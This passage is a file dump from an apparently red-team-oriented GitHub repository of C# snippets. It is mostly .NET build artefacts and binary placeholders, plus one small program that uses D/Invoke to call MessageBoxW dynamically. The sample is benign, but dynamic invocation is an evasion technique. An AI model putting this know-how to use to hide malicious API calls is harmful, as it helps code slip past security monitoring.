https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.exe
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.pdb
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/CreateProcess.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | b351b3d00ca3c03e51b59834718911d9c23098dd
2 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = CreateProcess
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\CreateProcess\CreateProcess\
4 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.assets.cache
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.AssemblyReference.cache
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 3fadf03217e11926521b06ed9b8085675261cf23
2 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.dll
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 3881e9f28961f9ea3c56435a33a20e8625ca3050
2 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/CreateProcess.pdb
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "saUOiuZs4N1XGJjv8U8hSTphYX/o7jDBupib+9SsVYrMLsjiGA5Ef9mmzG37uAFnWIrBwREfu6Zl4SY+Vdtdpg==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\CreateProcess\\CreateProcess\\CreateProcess.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/CreateProcess/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "dependencies": {
11 | "DInvoke": "1.0.0.0"
12 | },
13 | "runtime": {
14 | "ConsoleApp1.dll": {}
15 | }
16 | },
17 | "DInvoke/1.0.0.0": {
18 | "runtime": {
19 | "DInvoke.dll": {
20 | "assemblyVersion": "1.0.0.0",
21 | "fileVersion": "1.0.0.0"
22 | }
23 | }
24 | }
25 | }
26 | },
27 | "libraries": {
28 | "ConsoleApp1/1.0.0": {
29 | "type": "project",
30 | "serviceable": false,
31 | "sha512": ""
32 | },
33 | "DInvoke/1.0.0.0": {
34 | "type": "reference",
35 | "serviceable": false,
36 | "sha512": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\CreateProcess_DInvoke\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CopyComplete
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 890e13325aa239a8b4c339ecd90aadc0f11a8268
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 3b5c6a64568502b382a025d7d63fc56001b8cfc2
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "s0Rx2AjoogtPrzhPqICiGoIAaOhAaXq7236tFh1d2TUSXH6RhgLHIZ70CFol5UH1GdlgyQTBfhaddK/3tF5Lag==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\CreateProcess_DInvoke\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/CreateProcess_DInvoke/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/MessageBoxW_DInvoke.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 |
4 | using DInvoke.DynamicInvoke;
5 |
6 | namespace MessageBoxW_DInvoke
7 | {
8 | class Program
9 | {
10 | [UnmanagedFunctionPointer(CallingConvention.StdCall, CharSet = CharSet.Unicode)]
11 | delegate int MessageBoxW(IntPtr hWnd, string lpText, string pCaption, uint uType);
12 | static void Main(string[] args)
13 | {
14 | var parameters = new object[] { IntPtr.Zero, "My first D/Invoke!", "Hello world!", (uint)0 };
15 | Generic.DynamicAPIInvoke("user32.dll", "MessageBoxW", typeof(MessageBoxW), ref parameters);
16 |
17 | }
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "MessageBoxW_DInvoke/1.0.0": {
10 | "dependencies": {
11 | "DInvoke": "1.0.0.0"
12 | },
13 | "runtime": {
14 | "MessageBoxW_DInvoke.dll": {}
15 | }
16 | },
17 | "DInvoke/1.0.0.0": {
18 | "runtime": {
19 | "DInvoke.dll": {
20 | "assemblyVersion": "1.0.0.0",
21 | "fileVersion": "1.0.0.0"
22 | }
23 | }
24 | }
25 | }
26 | },
27 | "libraries": {
28 | "MessageBoxW_DInvoke/1.0.0": {
29 | "type": "project",
30 | "serviceable": false,
31 | "sha512": ""
32 | },
33 | "DInvoke/1.0.0.0": {
34 | "type": "reference",
35 | "serviceable": false,
36 | "sha512": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.exe
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/bin/Debug/netcoreapp3.1/MessageBoxW_DInvoke.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 43c8296b4e0a8fdf49a8348a6a774af279b8e8ec
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = MessageBoxW_DInvoke
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke\MessageBoxW_DIvoke\MessageBoxW_DIvoke\
4 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.assets.cache
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CopyComplete:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CopyComplete
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 8080b4b6e0ab0736b80891287505de97fbf66b6c
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.dll
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 0a28cd972ee4b2cfc5ff5e631d3d6ec2b8dd35a3
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DInvoke.pdb
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | f1d791e42d3bccd1c48106d85910be18dbf5cba6
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = MessageBoxW_DIvoke
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\DIvoke\MessageBoxW_DIvoke\MessageBoxW_DIvoke\
4 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.assets.cache
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/MessageBoxW_DIvoke.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/MessageBoxW_DInvoke.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/MessageBoxW_DIvoke.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/DInvoke/MessageBoxW_DIvoke/MessageBoxW_DIvoke/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "dxJv26YaFJvd5EeJoi/kq1XCYG6OAtayh6Z4OWkVUt5fmhy1yk8PQULjnZic8qEi8RGRncwiqV4zWb6W/GZkBw==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\DIvoke\\MessageBoxW_DIvoke\\MessageBoxW_DIvoke\\MessageBoxW_DInvoke.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
10 | ..\..\..\..\..\..\..\Tools\DInvoke\DInvoke\DInvoke\bin\Debug\DInvoke.dll
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "dependencies": {
11 | "DInvoke": "1.0.0.0"
12 | },
13 | "runtime": {
14 | "ConsoleApp1.dll": {}
15 | }
16 | },
17 | "DInvoke/1.0.0.0": {
18 | "runtime": {
19 | "DInvoke.dll": {
20 | "assemblyVersion": "1.0.0.0",
21 | "fileVersion": "1.0.0.0"
22 | }
23 | }
24 | }
25 | }
26 | },
27 | "libraries": {
28 | "ConsoleApp1/1.0.0": {
29 | "type": "project",
30 | "serviceable": false,
31 | "sha512": ""
32 | },
33 | "DInvoke/1.0.0.0": {
34 | "type": "reference",
35 | "serviceable": false,
36 | "sha512": ""
37 | }
38 | }
39 | }
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/DInvoke/Syscalls_DInvoke/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
